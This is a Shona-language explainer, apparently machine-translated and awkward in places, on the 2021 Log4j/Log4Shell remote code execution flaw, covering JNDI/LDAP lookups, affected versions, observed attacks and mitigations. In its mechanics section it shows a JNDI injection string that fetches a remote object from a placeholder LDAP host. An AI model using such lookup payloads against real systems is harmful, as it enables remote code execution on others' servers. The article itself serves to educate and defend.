Zviri Mukati[Viga][Ratidza]
Mukupera kwaMbudzi 2021, takafumura kutyisidzira kukuru kune cybersecurity. Izvi zvingangokanganisa mamiriyoni emakombiyuta pasi rose.
Iri igwara pamusoro pekusagadzikana kweLog4j uye kuti chikanganiso chedhizaini chakasiiwa chakasiiwa pamusoro pe90% yemakomputa epasirese masevhisi akavhurika kuti arwiswe.
Apache Log4j ndeye yakavhurika-sosi Java-yakavakirwa matanda utility yakagadziriswa neApache Software Foundation. Pakutanga yakanyorwa naCeki Gülcü muna 2001, chave chikamu cheApache Logging Services, chirongwa cheApache Software Foundation.
Makambani kutenderera pasirese anoshandisa iyo Log4j raibhurari kugonesa matanda pakushandisa kwavo. Muchokwadi, raibhurari yeJava inowanikwa kwese, unogona kuiwana mumashandisirwo kubva kuAmazon, Microsoft, Google, nezvimwe.
Kukurumbira kweraibhurari kunoreva kuti chero kukanganisa kunogona kuitika mukodhi kunogona kusiya mamirioni emakomputa akavhurika kubirwa. Musi waNovember 24, 2021, a kuchengetedzwa kwegore muongorori anoshandira Alibaba akawana chikanganiso chakashata.
Kusagadzikana kweLog4j, kunozivikanwawo seLog4Shell, kwakavapo kusingaonekwe kubva 2013. Kusagadzikana kwakabvumira vatambi vane hutsinye kuti vamhanye kodhi pamasisitimu akakanganisika achimhanya Log4j. Yakaburitswa pachena muna Zvita 9, 2021
Nyanzvi dzeindasitiri dzinodaidza iyo Log4Shell kukanganisa hukuru hwekusagadzikana mundangariro dzazvino.
Musvondo rakatevera kuburitswa kwekusagadzikana uku, zvikwata zvecybersecurity zvakaona mamirioni ekurwiswa. Vamwe vaongorori vakatoona kurwiswa kunopfuura zana paminiti.
Sei kushanda?
Kuti tinzwisise kuti sei Log4Shell ine njodzi, isu tinofanirwa kunzwisisa zvayaikwanisa kuita.
Kusagadzikana kweLog4Shell kunobvumira kuita zvekupokana kodhi, izvo zvinoreva kuti munhu anorwisa anogona kumhanyisa chero rairo kana kodhi pamushini waunonangwa.
Inoita sei izvi?
Kutanga, isu tinofanirwa kunzwisisa kuti JNDI chii.
Iyo Java Naming uye Dhairekitori Interface (JNDI) ibasa reJava rinobvumira zvirongwa zveJava kuwana uye kutsvaga data nezviwanikwa kuburikidza nezita. Aya madhairekitori masevhisi akakosha nekuti anopa yakarongeka seti yemarekodhi kune vanogadzira kuti vataure zviri nyore kana vachigadzira maapplication.
Iyo JNDI inogona kushandisa akasiyana maprotocol kuwana imwe dhairekitori. Imwe yeaya maprotocol ndeye Lightweight Directory Access Protocol, kana LDAP.
Pakutema tambo, log4j vanoita zvinotsiva tambo pavanosangana nemataurirwo efomu ${prefix:name}
.
Semuyenzaniso, Text: ${java:version}
inogona kunyorwa seChinyorwa: Java vhezheni 1.8.0_65. Aya marudzi ekutsiva akajairika.
Tinogonawo kuva nematauriro akadai Text: ${jndi:ldap://example.com/file}
iyo inoshandisa iyo JNDI system kurodha chinhu cheJava kubva kuURL kuburikidza neLDAP protocol.
Izvi zvinotakura zvinobudirira data rinouya kubva kune iyo URL mumushini. Chero angangoita hacker anogona kugamuchira kodhi ine hutsinye paruzhinji URL uye kumirira michina inoshandisa Log4j kuti inyore.
Sezvo zviri mukati memeseji yerogi zvine data inodzorwa nemushandisi, matsotsi anogona kuisa ega mareferensi eJNDI anonongedzera kumaseva eLDAP avanotonga. Aya maseva eLDAP anogona kuzara nezvinhu zvakashata zveJava izvo JNDI inogona kuita kuburikidza nekusagadzikana.
Chinoita kuti izvi zvinyanye kushata ndechekuti hazvina basa kana application iri server-side kana client-side application.
Chero paine nzira yekuti murogi averenge kodhi yakaipa yeanorwisa, application ichiri yakavhurika kuti ishandise.
Ndiani anobatwa?
Kusagadzikana uku kunokanganisa masisitimu nemasevhisi anoshandisa APache Log4j, ine shanduro 2.0 kusvika uye kusanganisira 2.14.1.
Nyanzvi dzinoverengeka dzekuchengetedza dzinopa zano kuti kusazvibata kunogona kukanganisa akati wandei maapplication uchishandisa Java.
Iko kukanganisa kwakatanga kuwanikwa mumutambo wevhidhiyo weMinecraft weMicrosoft. Microsoft yakakurudzira vashandisi vavo kuti vasimudzire yavo Java edition Minecraft software kudzivirira chero njodzi.
Jen Easterly, Director weCybersecurity and Infrastructure Security Agency (CISA) vanoti vatengesi vane mutoro mukuru kudzivirira vashandisi kubva kune vane utsinye vatambi vanoshandisa kusazvibata uku.
"Vatengesi vanofanirwawo kutaurirana nevatengi vavo kuti vaone kuti vashandisi vekupedzisira vanoziva kuti chigadzirwa chavo chine njodzi iyi uye vanofanirwa kukoshesa kugadziridzwa kwesoftware."
Kurwiswa uku kunonzi kwatotanga. Symantec, kambani inopa cybersecurity software, yakaona huwandu hwakasiyana hwezvikumbiro zvekurwiswa.
Heino mimwe mienzaniso yemhando dzekurwiswa dzakaonekwa nevaongorori:
- botnets
Botnets network yemakomputa ari pasi pekutonga kwerimwe bato rinorwisa. Ivo vanobatsira kuita DDoS kurwisa, kuba data, uye humwe hutsotsi. Vatsvagiri vakacherekedza iyo Muhstik botnet mune zvinyorwa zvemagobho zvakatorwa kubva kuLog4j kushandiswa.
- XMRig Miner Trojan
XMRig ndeye yakavhurika-sosi cryptocurrency miner inoshandisa maCPU kuchera iyo Monero tokeni. MaCybercriminals anogona kuisa XMRig pamidziyo yevanhu kuitira kuti vashandise simba ravo rekugadzirisa pasina ruzivo rwavo.
- Khonsari Ransomware
Ransomware inoreva chimiro chemalware yakagadzirirwa encrypt mafaira pakombiyuta. Vanorwisa vanogona kuzokumbira muripo mukutsinhana nekupa mukana kudzoreredza mafaera akavharidzirwa. Vatsvagiri vakawana iyo Khonsari ransomware muLog4Shell kurwisa. Vanonanga masevha eWindows uye vanoshandisa iyo .NET framework.
Chii chinoitika zvino?
Nyanzvi dzinofanotaura kuti zvinogona kutora mwedzi kana kunyange makore kugadzirisa zvizere nyonganyonga yakaunzwa nekusagadzikana kweLog4J.
Maitiro aya anosanganisira kuvandudza ese akabatwa sisitimu ine chigamba vhezheni. Kunyangwe ese aya masisitimu akaiswa zvigamba, kuchine kutyisidzira kuri kuuya kwezvinogoneka kumashure uko matsotsi anogona kunge atowedzera kuhwindo iro maseva akavhurirwa kurwiswa.
zhinji mhinduro uye kuderedza iripo kudzivirira maapplication kuti asashandiswe nebug iyi. Iyo itsva Log4j vhezheni 2.15.0-rc1 yakashandura marongero akasiyana siyana kuderedza kusazvibata uku.
Ese maficha anoshandisa JNDI anozoremara nekusarudzika uye kure kutarisa kwakarambidzwa zvakare. Kudzima iyo yekutarisa ficha pane yako Log4j setup ichabatsira kudzikisa njodzi yekugona kuita.
Kunze kweLog4j, pachine kudiwa kwehurongwa hwakakura hwekudzivirira yakavhurika-sosi zvibodzwa.
Pakutanga muna Chivabvu, White House yakaburitsa gwaro executive order iyo ine chinangwa chekuvandudza cybersecurity yenyika. Yaisanganisira gadziriro yesoftware bhiri yezvinhu (SBOM) iro raive gwaro repamutemo raive nerondedzero yezvinhu zvese zvaidiwa kuvaka application.
Izvi zvinosanganisira zvikamu zvakaita se open source mapakeji, zvinoenderana, uye maAPI anoshandiswa kusimudzira. Kunyangwe iyo pfungwa yeSOMs ichibatsira pakujeka, ichabatsira mutengi here?
Kukwidziridza kutsamira kungave kwakanyanya kunetseka. Makambani anogona kungosarudza kubhadhara chero faindi pane kuisa njodzi kutambisa imwe nguva kutsvaga mamwe mapakeji. Zvichida aya maSOM anozongobatsira kana avo scope inogumira mberi.
mhedziso
Iyo Log4j nyaya inopfuura dambudziko rehunyanzvi kumasangano.
Vatungamiri vebhizinesi vanofanirwa kuziva nezvenjodzi dzinogona kuitika kana maseva avo, zvigadzirwa, kana masevhisi achivimba nekodhi iyo ivo pachavo vasingachengetedze.
Kuvimba neakavhurika-sosi uye yechitatu bato zvikumbiro zvinogara zvichiuya nehumwe huwandu hwenjodzi. Makambani anofanirwa kufunga nezve kushanda nzira dzekudzikisa njodzi kusati kwauya kutyisidzira kutsva.
Yakawanda yewebhu inotsamira pane yakavhurika-sosi software inochengetwa nezviuru zvevanozvipira pasi rese.
Kana isu tichida kuchengetedza webhu nzvimbo yakachengetedzeka, hurumende nemakambani anofanirwa kuisa mari mukupa mari yakavhurika sosi kuedza uye cybersecurity agency senge. CISA.
Leave a Reply